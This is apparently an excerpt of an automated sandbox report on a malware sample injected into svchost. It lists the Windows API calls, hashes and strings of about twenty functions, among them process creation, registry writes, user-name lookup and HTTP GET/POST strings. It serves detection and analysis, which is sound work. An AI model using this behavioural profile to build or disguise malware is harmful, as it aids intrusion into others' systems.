Uniqueness Score: -1.00%

Function 02B11CD5 Relevance: 12.1, APIs: 8, Instructions: 115memorysleepstringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02B11CFD
RtlAllocateHeap.NTDLL(00000000), ref: 02B11D04

Part of subcall function 02B11F07: wsprintfA.USER32 ref: 02B11F49

lstrcpy.KERNEL32(00000000,00000000), ref: 02B11D2D
GetProcessHeap.KERNEL32(00000000,?), ref: 02B11DF6
HeapFree.KERNEL32(00000000), ref: 02B11DFD
Sleep.KERNEL32(00001388), ref: 02B11E08
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B11E1A
HeapFree.KERNEL32(00000000), ref: 02B11E21

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpywsprintf
String ID:
API String ID: 4213899483-0
Opcode ID: 01394c91a6ba08d376b9f25ea2621098dddb12662c116dd7ac33992afd303185
Instruction ID: 4902874399d8c8d955ae2dd099fce383d4de5cc29f01e24021e5ead0009ef714
Opcode Fuzzy Hash: 01394c91a6ba08d376b9f25ea2621098dddb12662c116dd7ac33992afd303185
Instruction Fuzzy Hash: 5D419C729183009FD7209FA8D848B1BBBE8FF88354F9449AEF699C3150DB70D514CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B11E38 Relevance: 12.1, APIs: 8, Instructions: 81memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,02B11148,00000009,00000000,02B171E0,00000007), ref: 02B11E47
GetProcessHeap.KERNEL32(00000008,-0000000B,?,?,?,?,02B11148,00000009,00000000,02B171E0,00000007), ref: 02B11E67
RtlAllocateHeap.NTDLL(00000000), ref: 02B11E6E
lstrcpy.KERNEL32(0000000C,00000000), ref: 02B11E97
CreateThread.KERNEL32(00000000,00000000,02B11F56,00000000,00000000,00000000), ref: 02B11EDB
CloseHandle.KERNEL32(00000000,?,?,?,?,02B11148,00000009,00000000,02B171E0,00000007), ref: 02B11EE6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,02B11148,00000009,00000000,02B171E0,00000007), ref: 02B11EF3
HeapFree.KERNEL32(00000000,?,?,?,?,02B11148,00000009,00000000,02B171E0,00000007), ref: 02B11EFA

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseCreateFreeHandleThreadlstrcpylstrlen
String ID:
API String ID: 3086719409-0
Opcode ID: 3b54832f6de5d6e1834072221704478fad8dc325a899b319a7fdde1eb3f9b0cd
Instruction ID: 78d4881a8ee3c13fa7b20e70abe24eea76fa4b278863f45a0ab787118e76936c
Opcode Fuzzy Hash: 3b54832f6de5d6e1834072221704478fad8dc325a899b319a7fdde1eb3f9b0cd
Instruction Fuzzy Hash: A721B231910746AFD7118FB8DC88E67BBADFF05398B848958FA4987204DB70E824CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B1598A Relevance: 10.6, APIs: 7, Instructions: 100memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 02B159D3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 02B159E8
RtlAllocateHeap.NTDLL(00000000), ref: 02B159EF
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,-00000001,?), ref: 02B15A09
GetProcessHeap.KERNEL32(00000000,?), ref: 02B15A1E
HeapFree.KERNEL32(00000000), ref: 02B15A25
RegCloseKey.ADVAPI32(00000000), ref: 02B15A2C

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFree
String ID:
API String ID: 1930173803-0
Opcode ID: a66b40d0a5d63a0c14c7fba545d0474d9c39c584968d0b9a9335b79fc06239ea
Instruction ID: c3ac39b6a57c4b36b879328d5924d8be5547c093470afa3755e1e9e855518cdc
Opcode Fuzzy Hash: a66b40d0a5d63a0c14c7fba545d0474d9c39c584968d0b9a9335b79fc06239ea
Instruction Fuzzy Hash: 33312731650305AFE7309F20CC48B3BB7ACEF89695F9448A8FA91C7280DB74D801C761

Uniqueness

Uniqueness Score: -1.00%

Function 02B115D5 Relevance: 10.6, APIs: 7, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 02B115E4
GetProcessHeap.KERNEL32(00000008,-00000103), ref: 02B115FA
RtlAllocateHeap.NTDLL(00000000), ref: 02B11601

Part of subcall function 02B156E6: GetTempPathA.KERNEL32(00000104,?), ref: 02B156F7

Part of subcall function 02B12E5A: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02B12E75

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B11669
HeapFree.KERNEL32(00000000), ref: 02B11670
GetProcessHeap.KERNEL32(00000000,?), ref: 02B11683
HeapFree.KERNEL32(00000000), ref: 02B1168A

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateCreateFilePathTemplstrlen
String ID:
API String ID: 953720001-0
Opcode ID: f1eddb29cb49a643f284bce08ef3702d8610bbfe7931b5b9bf00dc56ca6188d2
Instruction ID: 53e90c9d03feb3e667d7e38017f87b14b1c2079826981b7813d7f3a323476550
Opcode Fuzzy Hash: f1eddb29cb49a643f284bce08ef3702d8610bbfe7931b5b9bf00dc56ca6188d2
Instruction Fuzzy Hash: F811E172850305BBE7009FA89C48F7AB76CEF4A795F884859FB4983044CF3598619B75

Uniqueness

Uniqueness Score: -1.00%

Function 02B14E55 Relevance: 10.6, APIs: 7, Instructions: 62memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,00000000,?,?,02B149A2,00000000,00000000,?,00000000,00000000,02B170E8), ref: 02B14E70
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02B14E77
CreateThread.KERNEL32(00000000,00000000,02B14F6B,00000000,00000000,00000000), ref: 02B14EAA
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,02B170E8), ref: 02B14EB6
HeapFree.KERNEL32(00000000,?,00000000,00000000,02B170E8), ref: 02B14EBD
CloseHandle.KERNEL32(00000000,00000000,?,?,02B149A2,00000000,00000000,?,00000000,00000000,02B170E8), ref: 02B14ECD
CloseHandle.KERNEL32(00000000,?,00000000,00000000,02B170E8), ref: 02B14EDF

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$AllocateCreateFreeThread
String ID:
API String ID: 1729137577-0
Opcode ID: b9a3e040a3d353e87c30d99055d656d9eed67d76837ccf3e96f78054318ed59b
Instruction ID: cb5c6e85c944c7a8d7d6f61c696eacbdb7fcaf6dca390dd5076e11e940f70bfe
Opcode Fuzzy Hash: b9a3e040a3d353e87c30d99055d656d9eed67d76837ccf3e96f78054318ed59b
Instruction Fuzzy Hash: 45112B33E45322A7D7254E745C0CF27BB6DEF49B51F954994F945DB188CB60C81086B0

Uniqueness

Uniqueness Score: -1.00%

Function 02B158A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 02B12EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02B12D76,?,?,?,?), ref: 02B12ED5

memset.MSVCRT ref: 02B158E2
lstrcpyW.KERNEL32(?,02B163B4), ref: 02B1590D
lstrcatW.KERNEL32(?,02B1764C), ref: 02B1591F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02B1593B
ExitProcess.KERNEL32 ref: 02B15946

Strings

D, xrefs: 02B158EA

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExitFilelstrcatlstrcpymemset
String ID: D
API String ID: 898148731-2746444292
Opcode ID: 0fc02e8c0391e5d765a0195bccbb2d752193dc4654a97040f02152676342d0d7
Instruction ID: 4c57e007d12587151ec7a8289decb670a29cc85c589868d902246be638deade4
Opcode Fuzzy Hash: 0fc02e8c0391e5d765a0195bccbb2d752193dc4654a97040f02152676342d0d7
Instruction Fuzzy Hash: 61113CB2940208AFDB209FE4DC09FEA77BCEB84755F8044A1BA09D7144EB349A149B65

Uniqueness

Uniqueness Score: -1.00%

Function 02B13BE0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02B13BF9
RtlReAllocateHeap.NTDLL(00000000), ref: 02B13C4D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000104,00000000,00000000), ref: 02B13CB5
HeapFree.KERNEL32(00000000), ref: 02B13CEB
HeapFree.KERNEL32(00000000), ref: 02B13D00

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateByteCharCurrentMultiProcessWide
String ID:
API String ID: 3321845206-0
Opcode ID: 5a45e0c3a5a2f60f3f3de242a00a9639d85bc12d34d5dee9e62bce8429f939ad
Instruction ID: fe5503fa42190995918b27780424ff73052fcc2def8a4e8e82e1bdef00074447
Opcode Fuzzy Hash: 5a45e0c3a5a2f60f3f3de242a00a9639d85bc12d34d5dee9e62bce8429f939ad
Instruction Fuzzy Hash: 4931A371649315AFE7209B749C49FBBBADCEF45B85F8409E8B946C3040FB60D894C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02B15A75 Relevance: 9.1, APIs: 6, Instructions: 92memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000001), ref: 02B15ACA
RtlAllocateHeap.NTDLL(00000000), ref: 02B15AD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?,00000001), ref: 02B15B24
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B15B2F
HeapFree.KERNEL32(00000000), ref: 02B15B36
RegCloseKey.ADVAPI32(?), ref: 02B15B3D

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseFreeValue
String ID:
API String ID: 1659168586-0
Opcode ID: 5226c665d7efddc544c60f3933a738999eaf14ed1c470dca3ec2b0c1fe33db71
Instruction ID: 1f43199fe0b499292d3a7848fdc4ef8a75603a1a65bc70e265be51a592475d0c
Opcode Fuzzy Hash: 5226c665d7efddc544c60f3933a738999eaf14ed1c470dca3ec2b0c1fe33db71
Instruction Fuzzy Hash: 4A214B32A843145BC3305FB49C98B2BBBADDFC9950FD14499F6919B281DFB0D80587A0

Uniqueness

Uniqueness Score: -1.00%

Function 02B12482 Relevance: 9.1, APIs: 6, Instructions: 71memorystringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 02B124B4
lstrlen.KERNEL32(00000000), ref: 02B124D7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B12524
HeapFree.KERNEL32(00000000), ref: 02B1252B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B1254C
HeapFree.KERNEL32(00000000), ref: 02B12553

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$ObjectSingleWaitlstrlen
String ID:
API String ID: 2190776780-0
Opcode ID: b69739f174b51e25767f996418f50e43700822b70bfd223a76fccf564cafc586
Instruction ID: 9203748b4d448312e97fb182a4e0807e4be6315f832c1bc0fb1eff195abf4d10
Opcode Fuzzy Hash: b69739f174b51e25767f996418f50e43700822b70bfd223a76fccf564cafc586
Instruction Fuzzy Hash: E1214C72C00219EBEF11DFE1D94D7AEBBB9EF0436AFA40495D901A2180DBB44B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B138A9 Relevance: 9.1, APIs: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

_vsnprintf.MSVCRT ref: 02B138B8
GetProcessHeap.KERNEL32(00000008,00000009), ref: 02B138D6
RtlAllocateHeap.NTDLL(00000000), ref: 02B138DD
_vsnprintf.MSVCRT ref: 02B138F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B1390C
HeapFree.KERNEL32(00000000), ref: 02B13913

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process_vsnprintf$AllocateFree
String ID:
API String ID: 3096491335-0
Opcode ID: 9b2d912d7b5936fb59f5fe80f96f1efff1813caf113f482901cb82d51d1c23b3
Instruction ID: 6db56361d42cd6832efa3398d0ab56722de7b94617f8bb053a9884a6106e276b
Opcode Fuzzy Hash: 9b2d912d7b5936fb59f5fe80f96f1efff1813caf113f482901cb82d51d1c23b3
Instruction Fuzzy Hash: 64018472540209BBD7116EA4DC05F7B77ACEB856A0F8444A5FF16C7144FB30DA218B70

Uniqueness

Uniqueness Score: -1.00%

Function 02B14423 Relevance: 9.0, APIs: 6, Instructions: 43memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02B130CE,00000000,?,02B130CE,?), ref: 02B14433
GetProcessHeap.KERNEL32(00000008), ref: 02B14447
RtlAllocateHeap.NTDLL(00000000), ref: 02B1444E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000001), ref: 02B14465
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B14471
HeapFree.KERNEL32(00000000), ref: 02B14478

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateByteCharFreeMultiWidelstrlen
String ID:
API String ID: 180588484-0
Opcode ID: 350c1dfbd856dc858b6fe827c30b271c116994bf9e1d78c0b81c412b0cc98c0e
Instruction ID: 031974c3a99c29f4e54079dd4d3cb7ffec2b84283e094daf9d917d5bc21c10bc
Opcode Fuzzy Hash: 350c1dfbd856dc858b6fe827c30b271c116994bf9e1d78c0b81c412b0cc98c0e
Instruction Fuzzy Hash: C4F0C271941212ABD7204F66AC0DE2BBE7CEFC5B66F55885CF845C3000DF308461E6A0

Uniqueness

Uniqueness Score: -1.00%

Function 02B116FF Relevance: 9.0, APIs: 6, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02B117FB,00000001), ref: 02B11708
GetProcessHeap.KERNEL32(00000008,-0000003F,00000001), ref: 02B11722
RtlAllocateHeap.NTDLL(00000000), ref: 02B11729
ExpandEnvironmentStringsA.KERNEL32(02B1138F,00000000,-00000040), ref: 02B1173B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B11747
HeapFree.KERNEL32(00000000), ref: 02B1174E

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandProcessStrings$AllocateFree
String ID:
API String ID: 420829650-0
Opcode ID: 8185f20acef274fd64929105a5f43cf63314c67ae6ad14c5473d861e174b74c2
Instruction ID: 685666fe9e9ec232ece34025290c25103d91f363c84ff5bb46f29a12e163cef8
Opcode Fuzzy Hash: 8185f20acef274fd64929105a5f43cf63314c67ae6ad14c5473d861e174b74c2
Instruction Fuzzy Hash: C8F02471A80201A7C7200F78BC0CF4B7AACEFCA691F910850FA49C3240EF30C8209660

Uniqueness

Uniqueness Score: -1.00%

Function 02B13332 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,02B160A0), ref: 02B1333C
QueryPerformanceCounter.KERNEL32(?), ref: 02B1334A
RtlLargeIntegerDivide.NTDLL(00000000,?,?,?,00000000), ref: 02B13372
GetTickCount.KERNEL32 ref: 02B1337A

Strings

&%c=%u, xrefs: 02B13332

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CountCounterDivideFrequencyIntegerLargeTick
String ID: &%c=%u
API String ID: 1708092081-2762644614
Opcode ID: 66a760d088dbac5dbea03bd3fd692381270eca693a4f1b3be876322c1ae5ee5c
Instruction ID: f5fe73ced60ff155dd5fb06e7da61a5e2daed3b29a5127fc9d61496d48166e56
Opcode Fuzzy Hash: 66a760d088dbac5dbea03bd3fd692381270eca693a4f1b3be876322c1ae5ee5c
Instruction Fuzzy Hash: 7FF01731E50208ABEF10DFE4E849AADBBF9FB44341F9488D4F505E3150EF31AA219B14

Uniqueness

Uniqueness Score: -1.00%

Function 02B1175D Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000003B), ref: 02B11784

Part of subcall function 02B116FF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02B117FB,00000001), ref: 02B11708

GetProcessHeap.KERNEL32(00000000,?), ref: 02B1180F
HeapFree.KERNEL32(00000000), ref: 02B11816

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandFreeProcessStrings
String ID:
API String ID: 2748148605-0
Opcode ID: cc0fbfeb0feff53c5045d20a3c4f18d5c3c7bed112ae32e64227801b2d20b375
Instruction ID: e702ed27d4510c46fa22dc2fc48e86cad5279be630a00750abe1e2e4672bb47f
Opcode Fuzzy Hash: cc0fbfeb0feff53c5045d20a3c4f18d5c3c7bed112ae32e64227801b2d20b375
Instruction Fuzzy Hash: AC3106725193129FEB169F689C04B3BB7E8EF45350F9448A9F685C7244EB30D441CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02B15348 Relevance: 7.6, APIs: 5, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 02B15367
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02B150BA,00000000), ref: 02B1537D
GetProcessHeap.KERNEL32(00000008,-0000005F,?,?,?,?,?,?,?,?,?,?,00000000,02B150BA,00000000), ref: 02B1538C
RtlAllocateHeap.NTDLL(00000000), ref: 02B15393
lstrcpy.KERNEL32(00000000,?), ref: 02B153A3

Part of subcall function 02B14543: StrStrIA.SHLWAPI(?,?,?,?,02B1712C,02B162E4,02B17224,?), ref: 02B14563

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocateProcesslstrlen
String ID:
API String ID: 3287547560-0
Opcode ID: 9d77b2371c89b28bc74642127e9e68fc688900687b620c073056fc2cfc5389fe
Instruction ID: 3b12c91c7a0df51c770f796a9c23908401959011bc01c07362594a2679dcbef7
Opcode Fuzzy Hash: 9d77b2371c89b28bc74642127e9e68fc688900687b620c073056fc2cfc5389fe
Instruction Fuzzy Hash: 7D116AB294412DAAEB11EBE4DC06CFFB7BCEB04700B980896F911D7014EF7096558BA5

Uniqueness

Uniqueness Score: -1.00%

Function 02B13763 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000009,00000000,?,02B136F0,02B11134,?), ref: 02B1378E
RtlAllocateHeap.NTDLL(00000000,?,02B136F0), ref: 02B13795
_vsnprintf.MSVCRT ref: 02B137AF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,02B136F0,02B11134,?), ref: 02B137EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,02B136F0,02B11134,?), ref: 02B137F3

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree_vsnprintf
String ID:
API String ID: 3135751541-0
Opcode ID: 6887afc67aff6013f7f6bfebcb9b0c15be2528294a29fa67e40d1091769b0fae
Instruction ID: 4e9f2f622b5d0feb34ba05d11fed30fa3674300b0b0a78d68297a401c859927c
Opcode Fuzzy Hash: 6887afc67aff6013f7f6bfebcb9b0c15be2528294a29fa67e40d1091769b0fae
Instruction Fuzzy Hash: D6018872544202BFD7515BB5AC05F677BAEEF847A0FD448E4FA1883114FB3189219B61

Uniqueness

Uniqueness Score: -1.00%

Function 02B14F6B Relevance: 7.5, APIs: 5, Instructions: 36memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02B14F79
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02B14F84
CloseHandle.KERNEL32(00000000), ref: 02B14F8B
GetProcessHeap.KERNEL32(00000000,?), ref: 02B14FB5
HeapFree.KERNEL32(00000000), ref: 02B14FBC

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CloseCodeExitFreeHandleObjectSingleWait
String ID:
API String ID: 2978294806-0
Opcode ID: 77ad012500a8be7a9e96262bc5349af475c239d72e86fa02b86cf822859b5343
Instruction ID: c3a5879c37d60bb50e5e3530bd8138d89c4b21785baea3cf2b90eeca7d7bca2b
Opcode Fuzzy Hash: 77ad012500a8be7a9e96262bc5349af475c239d72e86fa02b86cf822859b5343
Instruction Fuzzy Hash: CEF02432C45228BBCB219FA0DC0CE9EBB38EF053A5F904290F90897144CB304A609BD0

Uniqueness

Uniqueness Score: -1.00%

Function 02B121C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,000000FA), ref: 02B12225
GetProcessHeap.KERNEL32(00000008,000006B5), ref: 02B1225A
RtlAllocateHeap.NTDLL(00000000), ref: 02B12261

Strings

f<v, xrefs: 02B123B0

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID: f<v
API String ID: 1296208442-2911902482
Opcode ID: f190f1f8c520c8c01208c5a7e23b487b8386e719691b3e7155f3430904d1eda2
Instruction ID: 5b8722cafa26ad5cf03f1a96af4ae66254cd732490108c6c589e952b3f011d0b
Opcode Fuzzy Hash: f190f1f8c520c8c01208c5a7e23b487b8386e719691b3e7155f3430904d1eda2
Instruction Fuzzy Hash: 3C819072908261AFD325DF64AC44A6BBBECEF45340F8548AEFCC5D3250E7749944C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02B1315E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000), ref: 02B132A2
RtlAllocateHeap.NTDLL(00000000), ref: 02B132AF

Strings

POST, xrefs: 02B131B9
GET, xrefs: 02B131D0, 02B131DC

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: GET$POST
API String ID: 1279760036-3192705859
Opcode ID: 387a3e3b1e7577da8d66ec0bceda2aa5ee453458778e49f4ce97b3b21bf347af
Instruction ID: ec46679ceb859b7f1d8a46b38963fca083524418e1e606f0049f0cb61dc57346
Opcode Fuzzy Hash: 387a3e3b1e7577da8d66ec0bceda2aa5ee453458778e49f4ce97b3b21bf347af
Instruction Fuzzy Hash: B05168B1644346AFE7209F24DC84B2BBBECFF88644F84499DB996C3144EB34D8589B61

Uniqueness

Uniqueness Score: -1.00%

Function 02B13923 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72processCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 02B1392F
memset.MSVCRT ref: 02B13983
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,00000044,00000000,?,?), ref: 02B139B3

Strings

D, xrefs: 02B1398B

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: ActiveConsoleCreateProcessSessionUsermemset
String ID: D
API String ID: 108488881-2746444292
Opcode ID: e05d1021b13e96614342580c63df86d646b15e8e360b021459afc213773cc644
Instruction ID: 8b87519e3f93edb9af0420eb55cf30c8b13c5977926b23c1dfeda30e220bf4ee
Opcode Fuzzy Hash: e05d1021b13e96614342580c63df86d646b15e8e360b021459afc213773cc644
Instruction Fuzzy Hash: 5311A572804319ABC710AF21DC04D5BBFECEF857E4F420A69FE55A3154DB3299149BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B14EEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56processthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,02B14EC9,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 02B14F35

Part of subcall function 02B149EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B14F4C,?,00000000), ref: 02B14A7A
Part of subcall function 02B149EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02B14F4C,?,00000000,?,?,?), ref: 02B14A81
Part of subcall function 02B149EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B14F4C,?,00000000), ref: 02B14A92
Part of subcall function 02B149EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02B14F4C,?,00000000,?,?,?), ref: 02B14A99

ResumeThread.KERNEL32(02B149A2,?,?,?), ref: 02B14F51
CloseHandle.KERNEL32(02B149A2,?,?,?), ref: 02B14F5A

Strings

D, xrefs: 02B14F02

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$CloseCreateHandleResumeThread
String ID: D
API String ID: 2798461596-2746444292
Opcode ID: 4fa496955467852a82b3a8c95ce9f5561e620dc19593190e7c59fdfc5c97ec48
Instruction ID: 74211601edd4d5dd9f6eea9536418af5f0141b63b012d6c1ce54a822414e43b2
Opcode Fuzzy Hash: 4fa496955467852a82b3a8c95ce9f5561e620dc19593190e7c59fdfc5c97ec48
Instruction Fuzzy Hash: EF010CB294420CBFEB409AE8DC85DEFB7BDFB48354F900865F609E7050EB319E148A61

Uniqueness

Uniqueness Score: -1.00%

